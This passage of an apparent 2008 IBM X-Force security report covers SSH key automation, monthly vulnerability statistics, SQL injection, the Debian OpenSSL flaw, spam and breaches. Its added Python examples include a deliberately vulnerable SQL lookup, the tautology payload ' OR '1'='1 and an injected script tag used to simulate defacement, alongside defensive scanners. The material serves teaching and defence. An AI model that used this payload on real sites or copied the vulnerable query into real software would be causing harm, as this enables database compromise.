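        self.state_path = state_path
        self.state = self._load()

    def _load(self) -> Dict:
        try:
            with open(self.state_path) as fh:
                return json.load(fh)
        except (OSError, ValueError):
            return {"position": 0, "audit": []}

    def _save(self) -> None:
        tmp = self.state_path + ".tmp"
        with open(tmp, "w") as fh:
            json.dump(self.state, fh)
        os.replace(tmp, self.state_path)      # atomic on POSIX

    def start(self) -> None:
        """Called by the orchestrating job when a run begins."""
        self.state = {"position": 0, "audit": []}
        self._save()

    def confirm(self, prompt: str) -> bool:
        """Decide one agent request; anything but the next key is refused."""
        fp = fingerprint_from_prompt(prompt)
        pos = self.state["position"]
        expected = self.sequence[pos] if pos < len(self.sequence) else None
        allowed = fp is not None and fp == expected
        self.state["audit"].append({"time": time.time(), "fingerprint": fp,
                                    "expected": expected, "allowed": allowed})
        if allowed:
            self.state["position"] = pos + 1
        self._save()
        return allowed

    def finished(self) -> bool:
        return self.state["position"] >= len(self.sequence)

    def violations(self) -> List[Dict]:
        return [entry for entry in self.state["audit"] if not entry["allowed"]]


def demo_run() -> Dict:
    """Walk a three-key job through two misuse attempts and a post-run attempt.

    A new KeySequencer is built for every prompt to mimic ssh-agent spawning a
    fresh askpass process each time; the state file carries the position.
    """
    seq = ["SHA256:k1k1k1", "SHA256:k2k2k2", "SHA256:k3k3k3"]
    prompts = [
        "Allow use of key lbb-step1?\nKey fingerprint SHA256:k1k1k1.",
        "Allow use of key lbb-step1?\nKey fingerprint SHA256:k1k1k1.",  # twice in a row
        "Allow use of key lbb-step3?\nKey fingerprint SHA256:k3k3k3.",  # out of order
        "Allow use of key lbb-step2?\nKey fingerprint SHA256:k2k2k2.",
        "Allow use of key lbb-step3?\nKey fingerprint SHA256:k3k3k3.",
        "Allow use of key lbb-step3?\nKey fingerprint SHA256:k3k3k3.",  # job already done
    ]
    with tempfile.TemporaryDirectory() as tmpdir:
        path = os.path.join(tmpdir, "sequence.json")
        KeySequencer(seq, path).start()
        decisions = [KeySequencer(seq, path).confirm(p) for p in prompts]
        final = KeySequencer(seq, path)
        return {"decisions": decisions, "finished": final.finished(),
                "violations": len(final.violations())}


if __name__ == "__main__":
    # As SSH_ASKPASS: ssh-agent passes the prompt in argv[1]; exit status answers.
    # LBB_KEY_SEQUENCE and LBB_SEQ_STATE are names invented for this example.
    sequence = [s for s in os.environ.get("LBB_KEY_SEQUENCE", "").split(",") if s]
    state = os.environ.get("LBB_SEQ_STATE", "/run/lbb/sequence.json")
    ok = KeySequencer(sequence, state).confirm(sys.argv[1] if len(sys.argv) > 1 else "")
    if not ok:
        print("lbb-confirm: key use refused (out of sequence)", file=sys.stderr)
    sys.exit(0 if ok else 1)
```

The orchestrating job calls start() when it begins and lists the fingerprints of its keys, in order, in LBB_KEY_SEQUENCE; every agent request then either advances the position or is refused and recorded in the audit list. Extending the state beyond a single position, for example to allow a repeated step or to add and retire keys as the job proceeds, is the finite state machine described above.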

[Figure: Server to server operation. Labels: ROOT and USER on each of two
remote servers; SSH-AGENT and FINITE STATE MACHINE on the automation control
system (Little Black Box); SYSLOG SERVER (Little Black Box).]

Using this technique, all automated processes and associated private keying
material can be migrated back into the security of the LBB and removed from
all remote systems. Embedded passwords and exposed keys on remote systems
are thereby eliminated while retaining the automation functionality.

A real world worst case example

Even with all of this, there are tasks and applications that, due to
complexity or poor design, are extremely difficult to isolate using these
techniques. One real world worst case is vzmigrate from the OpenVZ project.

OpenVZ is a container-based virtualization system for Linux, similar to
Solaris Zones or BSD jails. It provides low-overhead operating system
virtualization for virtual systems that share a common kernel. The vzmigrate
application can migrate running virtual systems between host systems.

The vzmigrate application works by progressively synchronizing the data of the
running virtual machine from the host it is running on to the host it is being
migrated to. When the data are sufficiently synchronized, vzmigrate suspends
the virtual machine in place, synchronizes the remaining data and machine
state, revives the suspended machine on the new host system, and then cleans
up the old data and any remnants. The virtual machine is moved from one host
system to another with very little production down time.

In order to perform this task, vzmigrate requires root access on both servers in
order to access all the files and to set up access, ownership, and permissions on
the destination system. It also must have the ability to write to the destination
system in several areas and must be able to remove old data no longer in use. It
operates where the virtual system is initially running and moves data and
system state information to the destination. This all adds up to a worst case
scenario. The application writes massive amounts of data to several locations on
a remote system and requires remote execution of several commands, including
rsync, vzctl, and rm, amongst others.

While this may be manageable using forced commands on the destination, it is
complex at best and difficult to generalize without creating security holes.

An LBB may be used for another approach. This time, an interactive user
connects to the LBB using an unprivileged account and runs a vzmigrate
wrapper on that system. The vzmigrate wrapper sets up its own SSH
authentication agent and loads appropriate keys. It can then connect to the first
hosting server using an unprivileged user account and connect through
localhost up to root. From there, it runs the vzmigrate command to the second
remote server, the destination for the virtual server. All authentication is
managed as in the automation case described previously. In this case, the
operation is initiated by an administrator, rather than a cron job.

[Figure: vzmigrate operation. An interactive USER on a CLIENT SYSTEM connects
over SSH to the automation server (Little Black Box), where the VZMIGRATE
WRAPPER runs as VZUSER with its own SSH-AGENT; it reaches VZUSER and then ROOT
on the first remote server, which runs the SSH VZMIGRATE IMPLEMENTATION
against ROOT on the second remote server. Logging goes to the SYSLOG SERVER
(Little Black Box).]

Granting root access on multiple remote systems to perform a complex task is
always a sensitive situation. In this case, three systems are actually
involved: the two host systems and the guest system being moved. The two host
systems merely have root access granted. From the standpoint of the guest
system, however, action is taking place outside of its nominal scope. This
“deus ex machina” can have serious impact on the virtual system without
appearing inside the system or its processes. To the guest system this is
beyond root access; it is the equivalent of remote physical access. By using
an LBB in this layered approach, the highly sensitive keys employed in this
case can be isolated from the requesting user as well as from the remote
systems.

SSH key authentication vs. single sign-on

Using authentication keys as described here is significantly different from
“single sign-on”, although it appears similar to the end user. Here, a user
signs on at a specific secure location and can then manage everything without
entering additional passwords and without exposing external systems to the
risks of reusable passwords. Unlike general purpose single sign-on, a user
cannot sign on anywhere and go anywhere; they can only sign on at a limited
number of sign-on locations and only from there be granted additional access.

At the end of the day

The importance of administrative access is to be able to deal with events
that were not anticipated. Someone has to have the authority to make
connections and perform operations that nobody planned for. This often
involves setting up automated or managed tasks for delegation to others, or
dealing with emergencies. For these last-resort problems there needs to be a
final set of keys. The objective of everything else is to minimize the demand
for these “omega” keys, and the objective of each use of an omega key is to
minimize its subsequent use. These keys should be subject to the utmost
security and stored on smart cards or in secured locations where they can be
tracked and inventoried. They are also the keys with the power to create new
keys at the highest level.

Recommendations
• Secure all private keying material in secure locations.
• Allow SSH agent forwarding with appropriate confirmations.
• Use a Little Black Box (LBB) for specialized tasks:
  – Secure logging server
  – Automation control server
  – Layered key storage
  – Agent proxy for complex keying arrangements
  – Central management of SSH configuration files such as authorized_keys
• Limit unconstrained root access to a limited number of “omega keys”.

Conclusion
This series started by pointing out the flaws inherent in reusable passwords and
how that represents the single largest vulnerability in SSH. During the course
of these articles, increasingly complex scenarios were presented where reusable
passwords have been eliminated and replaced with cryptographically strong
SSH authentication. These keys are then secured and managed in a way to
prevent their abuse and still allow for complex operations and automation. It is
possible to eliminate reusable passwords in SSH and secure the keys. By doing
so, organizations help secure the secure shell from the pervasive attacks on the
outside networks. At the same time, SSH use is simplified and overall security is
made more transparent and robust.

Prolific and impacting issues of May 2008

Significant disclosures
In May, the X-Force team analysts researched and assessed 530 security related
threats. A significant percentage of the vulnerabilities featured within the
X-Force team database became the focal point of malicious code writers whose
productions include malware and targeted exploits.

Total vulnerabilities in May 2008: 530

  Severity    Count
  Critical        1
  High           94
  Medium        350
  Low            85

The chart below categorizes the vulnerabilities researched by X-Force team
analysts according to what they believe would be the greatest category of
security consequence that could result from exploitation of the vulnerability.
The categories are: Bypass Security, Data Manipulation, Denial of Service, File
Manipulation, Gain Access, Gain Privileges and Obtain Information.*

[Figure: pie chart of the May 2008 vulnerabilities by consequence; the
percentages are listed below.]

* Represents unique vulnerability count.

Bypass Security – 7%
An attacker can bypass security restrictions such as a firewall or proxy, an IDS system
or a virus scanner.
Data Manipulation – 26%
An attacker is able to manipulate data stored or used by the host associated with the
service or application.
Denial of Service – 8%
An attacker can crash or hang a service or system, or take down a network.
File Manipulation – 0.4%
An attacker can create, delete, read, modify or overwrite files.
Gain Access – 48%
An attacker can obtain local and remote access. This also includes vulnerabilities in
which an attacker can execute code or execute commands, because this usually allows
the attacker to gain access to the system.
Gain Privileges – 3%
An attacker can gain privileges on the local system only.
Obtain Information – 6%
An attacker can obtain information such as file and path names, source code,
passwords or server configuration details.
Other – 2%
An attacker can perform other, less common attacks, such as price changing. Used when
the other consequences do not apply.

On May 13, 2008, the X-Force team published a protection alert to address a
serious vulnerability disclosed in the Microsoft Security Bulletin Summary for
May 2008. The Microsoft Jet Database Engine (msjet40.dll) is vulnerable to a
stack-based buffer overflow that could allow remote code execution. An
attacker could exploit this vulnerability by sending a malicious file as an
e-mail attachment or by hosting it on a Web site and persuading the victim to
click a link. This issue was publicly disclosed in late March with reports of
targeted attacks using this vulnerability. [11]

While .mdb is on the Microsoft default unsafe file type list, a Jet database
file can be opened from a Microsoft Word document. Although no public proof of
concept code has been published, X-Force analysts consider this to be the most
severe vulnerability in the May Microsoft patch release due to the active
exploitation that has been seen in the wild.

• A protection alert provided by IBM ISS: Microsoft Jet Database Engine
  (msjet40.dll) Remote Code Execution [12]
• IBM ISS Protection Signature:
  – MDB_Jet_Engine_Stack_Overflow
• Microsoft Security Bulletin MS08-028: Vulnerability in Microsoft Jet Database
  Engine Could Allow Remote Code Execution (950749) [13]
• CVE-2007-6026 [14]

Additional May highlights

This section of the report briefly covers some of the additional threats facing
security professionals during the month of May.

Elevation of Threat Level – SQL injection attacks

Last month, the threat level was elevated to AlertCon 2 and the X-Force team
produced a protection alert [15] as a result of a significant increase in the
volume of targeted SQL injection attacks observed by our analysts. This
report, as well as the past couple of reports, has highlighted the mass
compromise of a large number of Web sites over the past several months. In
May, however, these attacks escalated and culminated in automated SQL
injection attacks that, in some cases, have systematically defaced Web sites.

Some reports that surfaced earlier in May speculated that the attacks were
being carried out by a worm. Our analysts, however, have not confirmed a
self-propagation vector. At this time the activity looks more like botnet
driven mass defacement. Indications are that certain Trojans and botnets
associated with these attacks are running search engine queries for ASP/.NET
pages with certain characteristics and then attacking them en masse.

One such botnet, the Asprox botnet, is distributing an SQL injection tool
disguised as an executable named msscntr32.exe. The tool searches Google™ for
vulnerable Web pages and then injects an IFrame into those pages to redirect
visitors to malicious servers. The X-Force team identifies 20 to 30 new
malware-hosting sites each day that are linked to from legitimate URLs
compromised by these SQL injection attacks.

Any product that places data in SQL queries can be vulnerable to SQL
injection. Attackers use SQL injection techniques to exploit Web sites and
applications that build SQL queries from untrusted input without
parameterizing the query or otherwise neutralizing the characters that the
database interprets as SQL syntax. In many cases, all it takes is a single
improper line of code in a Web page to open it up to an SQL injection attack
that results in a compromise of the entire database and thus of the entire
site. Many modern Web sites have the database at their core, so this is a
pervasive problem.

We encourage readers to review the “SQL Injection” article at the beginning
of this report. It provides additional information regarding this threat and
guidance on ways to help mitigate the risk of SQL injection attacks.
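
The “single improper line of code” is easy to show. The following Python example is added for this report (not code from the article) and uses sqlite3 so that it runs without a server: it contrasts a product lookup that splices the caller’s string into the query with a parameterized one, and adds the scan a responder would run after one of the mass defacements, looking for the script and IFrame markup appended to text columns. The product table, the payloads and the defacement string are constructed for the example.

```python
#!/usr/bin/env python3
"""SQL injection: the one improper line, its fix, and a post-incident scan."""
import re
import sqlite3
from typing import List, Tuple

# Constructed sample catalogue for the example.
SAMPLE_PRODUCTS = [
    ("widget", "A small widget", 9.99),
    ("gadget", "A useful gadget", 19.99),
    ("gizmo", "A shiny gizmo", 29.99),
]

# The markup the mass-defacement tools appended to text columns.
INJECTED_MARKUP = re.compile(r"<\s*(script|iframe)\b", re.IGNORECASE)


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, "
                 "description TEXT, price REAL)")
    conn.executemany("INSERT INTO products (name, description, price) VALUES (?, ?, ?)",
                     SAMPLE_PRODUCTS)
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    """The single improper line: the caller's string becomes part of the SQL text."""
    sql = "SELECT id, name, price FROM products WHERE name = '%s'" % name
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    """Parameterized: the value travels separately from the statement, so quote
    characters in it are data and can never change the query's structure."""
    return conn.execute("SELECT id, name, price FROM products WHERE name = ?",
                        (name,)).fetchall()


def text_columns(conn: sqlite3.Connection) -> List[Tuple[str, str]]:
    """Every (table, column) declared TEXT, found from the schema catalogue."""
    tables = [row[0] for row in
              conn.execute("SELECT name FROM sqlite_master WHERE type = 'table'")]
    cols = []
    for table in tables:
        for row in conn.execute(f'PRAGMA table_info("{table}")'):
            if (row[2] or "").upper() == "TEXT":
                cols.append((table, row[1]))
    return cols


def find_injected_markup(conn: sqlite3.Connection) -> List[Tuple[str, str, int]]:
    """Return (table, column, rowid) for every text value carrying a script or
    iframe tag; a clean site yields an empty list."""
    hits = []
    for table, col in text_columns(conn):
        for rowid, value in conn.execute(f'SELECT rowid, "{col}" FROM "{table}"'):
            if isinstance(value, str) and INJECTED_MARKUP.search(value):
                hits.append((table, col, rowid))
    return hits


def simulate_mass_defacement(conn: sqlite3.Connection, tag: str) -> int:
    """Append `tag` to every text column, which is what the automated attacks did
    by walking the database catalogue. Applied directly here because sqlite3
    refuses the stacked statements the real payload used; returns rows changed."""
    changed = 0
    for table, col in text_columns(conn):
        cur = conn.execute(f'UPDATE "{table}" SET "{col}" = "{col}" || ? '
                           f'WHERE "{col}" IS NOT NULL', (tag,))
        changed += cur.rowcount
    conn.commit()
    return changed


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable:", lookup_vulnerable(db, payload))   # every product
    print("safe:      ", lookup_safe(db, payload))         # nothing
    simulate_mass_defacement(db, '<script src="http://example.invalid/b.js"></script>')
    print("defaced:   ", find_injected_markup(db))
```

The tautology payload returns every row from the vulnerable lookup and nothing from the safe one, and a UNION payload pulls the schema out of sqlite_master through the same line. The scan walks the schema catalogue the same way the attack tools did, which is also why the defacement reached every text column on affected sites rather than a single page.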

Active Exploitation – Adobe Flash Player

On May 27, 2008, reports [16] of active exploitation of a “zero-day”
vulnerability in Adobe Flash Player surfaced. Upon investigation, our analysts
determined that the circulating exploits were actually targeting the issue
identified by CVE-2007-0071, discovered by an X-Force team analyst and
discussed in the protection advisory [17] released in April of this year. The
Adobe Product Security Incident Response Team also confirmed that the exploit
in question targets this previously disclosed and patched issue in Adobe Flash
Player.

Adobe Flash Player does not properly handle a specific tag that can exist in
multimedia files. Improper handling of certain values causes a pointer
calculation to go awry, which allows the attacker to write to any memory
location and execute code. Attackers are injecting malicious code into third-
party sites that redirects users to sites hosting malicious files. These attacks
may also be tied to the SQL injection attacks noted in this report.

The ISS IPS coverage released in November of 2007 blocks the samples that are
currently circulating in the wild. The specific signature that covers this issue is
Multimedia_File_Overflow and is turned on and blocked by default in the Trust
X-Force policy. We also encourage those affected to ensure that the latest Adobe
Flash Player version, 9.0.124.0 or later, is installed.

Debian OpenSSL Debacle

A serious vulnerability affecting Debian’s OpenSSL package was disclosed in
May (CVE-2008-0166). The random number generator in this package is
predictable, so any key material it produced is drawn from a small,
enumerable set. Affected keys include SSH keys, OpenVPN keys, DNSSEC keys,
key material for X.509 certificates, and session keys used in SSL/TLS
connections. Ubuntu systems also use this OpenSSL package and are therefore
vulnerable. This issue may also affect other distributions and live CDs based
on Debian Etch, such as Knoppix and several bootable business cards.

Within 24 hours of the announcement, the complete set of all possible 1024 bit
DSA, 2048 bit RSA, and 4096 bit RSA keys that the flawed code could have
generated was posted publicly to a Web site. Additionally, a Perl script was
made publicly available that uses these keys to conduct SSH brute force
attacks. At the time of this writing, our analysts had not observed any brute
force attempts against authentication keys; all observed attempts have been
against passwords.

Those running Debian [18] or Ubuntu [19] systems and using keys for SSH
authentication that were generated between September 2006 and May 13, 2008
are vulnerable. We strongly urge all those affected to upgrade their OpenSSL
package, regenerate all cryptographic material, and remove the weak public
keys from the authorized_keys files of every system on which they were
installed.
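
Checking the keys already installed on servers is the practical follow-up. The Python below is an added example, not code from the article or from Debian’s ssh-vulnkey tool: it parses authorized_keys entries (including ones carrying options), computes each key’s MD5 fingerprint from the decoded key blob, and reports any that appear in a blacklist. The two keys and the blacklist are constructed from toy moduli so the example runs offline, and the blacklist holds full fingerprints, whereas the published Debian blacklist files store a shortened form that ssh-vulnkey matches; treat that comparison as the example’s assumption.

```python
#!/usr/bin/env python3
"""Find blacklisted (predictable) keys in authorized_keys (added example)."""
import base64
import hashlib
import shlex
import struct
from typing import Iterable, List, Optional, Set, Tuple

KEY_TYPES = ("ssh-rsa", "ssh-dss")   # the key types the Debian flaw produced


def _ssh_string(data: bytes) -> bytes:
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(n: int) -> bytes:
    # Positive mpint: big-endian bytes with a leading zero if the high bit is set.
    return _ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def rsa_public_blob(e: int, n: int) -> bytes:
    """Wire encoding of an ssh-rsa public key (RFC 4253, section 6.6)."""
    return _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)


def md5_fingerprint(blob: bytes) -> str:
    """Colon-separated MD5 digest of the blob, as ssh-keygen -l printed it in 2008."""
    digest = hashlib.md5(blob).hexdigest()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def parse_authorized_keys_line(line: str) -> Optional[Tuple[str, bytes, str]]:
    """Return (key type, decoded blob, comment); None for comments, blanks, junk.

    shlex keeps quoted options such as command="..." in one token, so the
    key type is simply the first token that names a supported type.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    try:
        tokens = shlex.split(line)
    except ValueError:
        return None
    for i, tok in enumerate(tokens):
        if tok in KEY_TYPES and i + 1 < len(tokens):
            try:
                blob = base64.b64decode(tokens[i + 1], validate=True)
            except ValueError:
                return None
            return tok, blob, " ".join(tokens[i + 2:])
    return None


def scan_authorized_keys(lines: Iterable[str],
                         blacklist: Set[str]) -> List[Tuple[int, str, str]]:
    """Return (line number, fingerprint, comment) for every blacklisted key."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        parsed = parse_authorized_keys_line(line)
        if parsed is None:
            continue
        _, blob, comment = parsed
        fp = md5_fingerprint(blob)
        if fp in blacklist:
            hits.append((lineno, fp, comment))
    return hits


# Constructed material: toy 128-bit moduli, not real keys, so this runs offline.
WEAK_BLOB = rsa_public_blob(65537, 0xC0FFEE0BADF00D1234567890ABCDEF11)
GOOD_BLOB = rsa_public_blob(65537, 0xDEADBEEF0123456789ABCDEF0FEDCBA1)
WEAK_FP = md5_fingerprint(WEAK_BLOB)
BLACKLIST = {WEAK_FP}   # stands in for the published set of weak fingerprints

SAMPLE_AUTHORIZED_KEYS = [
    "# backup automation key, installed 2007-11",
    'command="/usr/local/sbin/ssh-guard",no-pty ssh-rsa '
    + base64.b64encode(WEAK_BLOB).decode() + " lbb-backup",
    "ssh-rsa " + base64.b64encode(GOOD_BLOB).decode() + " admin@lbb",
    "this line is not a key",
]


def demo_scan() -> List[Tuple[int, str, str]]:
    return scan_authorized_keys(SAMPLE_AUTHORIZED_KEYS, BLACKLIST)


if __name__ == "__main__":
    for lineno, fp, comment in demo_scan():
        print(f"line {lineno}: blacklisted key {fp} ({comment})")
```

Running ssh-keygen -l on a key file gives the same MD5 fingerprint the code computes, which is a quick way to cross-check a hit. Note that the flagged key in the sample is the automation key with a command= restriction: forced commands limit what a key can do, but they do nothing for a key whose private half anyone can derive, so such keys must be replaced rather than further restricted.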

30th Anniversary of Spam

May 2008 marks the 30th anniversary of the first spam message ever sent. On
an average day, IBM ISS analyzes more than 150,000 unique spam messages.
Spam’s impact is global, reducing productivity within, and consuming the
network resources of, organizations around the world. As with all
contemporary cyber threats, spammers are well organized and constantly evolve
and improve their techniques, trying to stay one step ahead of both the victim
and the security products deployed to thwart their campaigns.

Spammers will continue to inundate inboxes as long as there is profit to be
made. While many of us delete, filter or block spam, there are individuals who
purchase the advertised items or fall for an advance fee fraud or lottery
scam, which gives the spammer a motive. According to a 2007 survey conducted
by Sophos, 11 percent of the individuals polled had bought spam-advertised
goods. [20] If everyone ignored spam, those seeking financial gain would
presumably have to drop this weapon from their arsenal as it would no longer
be a profitable venture.

The X-Force team believes that most spam e-mail is sent by bot networks.
Botnet operators “rent” their bots out to spammers who then launch massive
e-mail barrages in the shortest possible time to maximize their output while
escaping detection or blocking by antispam technologies and services. Since
bots can be controlled from anywhere, the nationality of the actual attackers
behind a spam e-mail may not be the same as the country from which the spam
originated. Additional spam statistics can be obtained from the IBM Internet
Security Systems X-Force 2007 Trend Statistics report (PDF). [21]

The spam industry will remain alive and well as long as there are recipients that
continue to provide spammers with the incentive to keep it going. Users should
be advised to ignore spam and avoid opening unsolicited attachments whether
it is an image, PDF, Microsoft Excel® or other type of file. An organization’s
anti-spam strategy should consist of an effective e-mail filter using
sophisticated techniques to analyze e-mail traffic.

Major security breaches

A number of high-profile security breaches are reported every year, drawing
attention to the need to protect consumer and employee information from
exposure to malicious individuals and identity (ID) theft rings. In addition
to the loss or misplacement of information, corporations and individuals are
at risk of exposure via malware, hacking, phishing attacks and various social
engineering tactics. There are also non-cyber methods such as stealing mail,
“dumpster diving” (rummaging through trash bins), or obtaining information
from employees or stolen records. Below are some of the major security
breaches that became public in the month of May:

• Bank of New York – An unencrypted backup tape containing sensitive
  information on some 4.5 million consumers went missing during transportation
  to a storage facility. [22]
• Chilean government sites – A hacker broke into various Chilean government
  sites and obtained data on 6 million people, which the hacker then posted
  publicly on the Internet. [23]
• Dave & Buster’s – Attackers compromised the network and remotely installed
  packet sniffing software on point-of-sale servers at eleven Dave & Buster’s
  locations throughout the U.S. The details of thousands of payment cards were
  accessed and fraudulent transactions took place. [24]
• Oklahoma State University – A server under the control of OSU Parking and
  Transit Services was accessed from another country without authorization.
  The database contained sensitive information, including addresses and Social
  Security numbers of OSU faculty, staff and students who had purchased a
  parking permit between July 2002 and March 2008. [25]
• Staten Island University Hospital – Computer equipment was stolen containing
  the personal information of about 88,000 patients. [26]
• US State Department – As many as 1,000 laptops are unaccounted for, several
  of which may belong to the department’s Anti-Terrorism Assistance
  Program. [27]

Malcode Corner
As part of the continued effort of the IBM ISS X-Force Virus Prevention System
(VPS) team in the strengthening of IBM ISS antivirus, anti-spyware and anti-
malware protection, the VPS team investigated and added another 12,158 new
samples to the malcode zoo in May, 2008.

The X-Force VPS team’s categorization of malcode is based on the most
dominant features of the threat. The categories are:

• Adware – Designed to deliver advertisements and in most cases, these
advertisements are unwanted.
• Backdoor – Provides functionality for a remote attacker to log on and/or execute
arbitrary commands on the affected system.
• Dialer – Uses modem connections to either dial back to the attacker or causes the
affected system to use primary-rate billing numbers when making connections.
• Downloader – Low-profile malcode that downloads and installs a more
sophisticated or updated malcode agent.
• Miscellaneous – All other malcode not falling into one of the primary categories.
• Password Stealer – Designed primarily to steal login credentials, such as those
used for instant messaging, online games and online applications.
• Rootkit – Usually acts as a component of another malcode and has the
functionality to hide files, registry entries and processes.
• Spy – Designed to monitor the user’s activity, such as logging key strokes and
tracking the user’s online activities. Similar to password stealers, Spy malcodes
may also have the functionality to capture login credentials and other confidential
information sent to online applications.
• Trojan – Usually appears to be a legitimate application before installing itself and
performing its malicious actions on the system. Examples of malicious actions can
include dropping another malcode, lowering the system’s security settings, and
allowing a remote attacker to relay network connections via the affected system in
order to conceal the real origin of the attacker.
• Virus – Propagates by infecting a host file and possibly doing some form of damage
to the host file.
• Worm – Self-propagates via e-mail, network shares, removable drives, file sharing
applications or instant messaging applications.

[Figure: pie chart of the May 2008 malcode samples by the categories above.]

Contributors to this paper include:

Michelle Alvarez – Team Leader, IBM MSS Intelligence Center
Michael Warfield – Senior Researcher and Analyst, IBM MSS Intelligence Center
Troy Bollinger – Senior Researcher, IBM MSS Intelligence Center
Luann Johnson – Manager, IBM ISS X-Force Database
IBM ISS X-Force Virus Prevention System (VPS) team

References

Securing the Secure Shell – Advanced configurations and automation

An Illustrated Guide to SSH Agent Forwarding
http://www.unixwiz.net/techtips/ssh-agent-forwarding.html

Secure Linux/UNIX access with PuTTY and OpenSSH
http://www.unixwiz.net/techtips/putty-openssh.html

Using public keys for SSH authentication
http://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter8.html

OpenSSH key management, Part 1: Understanding RSA/DSA authentication
http://www.ibm.com/developerworks/library/l-keyc.html

OpenSSH key management, Part 2: Introducing ssh-agent and keychain
http://www.ibm.com/developerworks/library/l-keyc2/

OpenSSH key management, Part 3: Agent forwarding and keychain improvements
http://www.ibm.com/developerworks/linux/library/l-keyc3/

SQL Injection

[1] SQL Injection
http://en.wikipedia.org/wiki/SQL_injection

[2] Mass Attack JavaScript injection - UN and UK Government websites compromise
http://securitylabs.websense.com/content/Alerts/3070.aspx

[3] United Nations, I Hate to Say I Told You So
http://hackademix.net/2008/04/23/united-nations-i-hate-to-say-i-told-you-so/

[4] A protection alert provided by IBM ISS: Automated SQL Injection Attacks
http://iss.net/threats/293.html

[5] A protection advisory provided by IBM ISS: Adobe Flash Player Invalid Pointer Vulnerability
http://iss.net/threats/289.html

[6] The 10.000 web sites infection mystery solved
http://isc.sans.org/diary.html?storyid=4294

[7] Danmec/Asprox SQL Injection Attack Tool Analysis
http://www.secureworks.com/research/threats/danmecasprox

[8] Gold farming
http://en.wikipedia.org/wiki/Gold_farming

[9] Urgent: Deciphering binary code executed against the database
http://www.developersdex.com/sql/message.asp?p=2290&r=6279713

[10] What tuning options should I consider before enabling blocking for SQL_Injection?
http://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/std_adp.php?p_faqid=4748

Prolific and impacting issues of May 2008

[11] UPDATE: MSRC Blog: Microsoft Security Advisory (950627)
http://blogs.technet.com/msrc/archive/2008/03/24/update-msrc-blog-microsoft-security-advisory-950627.aspx

[12] A protection alert provided by IBM ISS: Microsoft Jet Database Engine (msjet40.dll) Remote Code Execution
http://iss.net/threats/292.html

[13] Microsoft Security Bulletin MS08-028: Vulnerability in Microsoft Jet Database Engine Could Allow Remote Code Execution (950749)
http://www.microsoft.com/technet/security/bulletin/ms08-028.mspx

[14] CVE-2007-6026
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6026

[15] A protection alert provided by IBM ISS: Automated SQL Injection Attacks
http://iss.net/threats/293.html

[16] Adobe Flash zero-day exploit in the wild
http://blogs.zdnet.com/security/?p=1189

[17] A protection advisory provided by IBM ISS: Adobe Flash Player Invalid Pointer Vulnerability
http://iss.net/threats/289.html

[18] Debian Security Advisory DSA-1571-1: openssl – predictable random number generator
http://www.debian.org/security/2008/dsa-1571

[19] Ubuntu Security Notice USN-612-2: openssh vulnerability
http://www.ubuntu.com/usn/usn-612-2

[20] 11% of people admit to having bought goods sold via spam
http://www.sophos.com/pressoffice/news/articles/2007/12/spam-buyers.html

[21] IBM Internet Security Systems X-Force 2007 Trend Statistics (PDF) report
http://www.iss.net/documents/literature/x-force_2007_trend_statistics_report.pdf

[22] Data breach at New York bank possibly affecting hundreds of thousands of CT consumers
http://www.stamfordplus.com/stm/information/nws1/publish/News_1/Data_breach_at_New_York_bank_possibly_affecting_hundreds_of_thousands_of_CT_consumers2408.shtml

[23] Hacker splashes data from six million Chileans on Internet: report
http://afp.google.com/article/ALeqM5gBr0NRGekgAS90YwVpnBHHCxeLZw

[24] Restaurant chain hacked by packet sniffer
http://www.techworld.com/security/news/index.cfm?newsid=101479

[25] OSU Parking Services and Transit Incident
http://idalert.okstate.edu/incident_00003.html

[26] Staten Island University Hospital Patients Personal Records Stolen In December
http://cyberinsecure.com/staten-island-university-hospital-patients-personal-records-stolen-in-december/

[27] US State Department loses a lot of laptops
http://www.securecomputing.net.au/news/75415,us-state-department-loses-a-lot-of-laptops.aspx

* Information in this document concerning non-IBM products was obtained from
the suppliers of these products, published announcement material or other
publicly available sources. Questions on the capabilities of non-IBM products
should be addressed to the suppliers of those products.

All performance data contained in this publication was obtained in the specific
operating environment and under the conditions described above and is
presented as an illustration. Performance obtained in other operating
environments may vary and customers should conduct their own testing.

© Copyright IBM Corporation 2008.

IBM Global Services
Route 100
Somers, NY 10589
U.S.A.

Produced in the United States of America.
06-08
All Rights Reserved.

IBM and the IBM logo are trademarks or registered trademarks of International
Business Machines Corporation in the United States, other countries, or both.
ADDME, Ahead of the threat, BlackICE, Internet Scanner, Proventia, RealSecure,
SecurePartner, SecurityFusion, SiteProtector, System Scanner, Virtual Patch,
X-Force and X-Press Update are trademarks or registered trademarks of Internet
Security Systems, Inc. in the United States, other countries, or both. Internet
Security Systems, Inc. is a wholly-owned subsidiary of International Business
Machines Corporation.

Microsoft, Windows, Excel and SQL Server are trademarks or registered
trademarks of the Microsoft Corporation in the United States, other countries,
or both.

UNIX is a registered trademark of The Open Group in the United States and other
countries.

Linux is a registered trademark of Linus Torvalds in the U.S. and other
countries.

Google is a trademark of Google, Inc. in the U.S. and other countries.

World of Warcraft is a trademark of Blizzard Entertainment in the U.S. and/or
other countries.

RealPlayer is a trademark or registered trademark of RealNetworks, Inc.

Other company, product and service names may be trademarks or service marks of
others.

References in this publication to IBM products or services do not imply that
IBM intends to make them available in all countries in which IBM operates.

U.S. Patent No. 7,093,239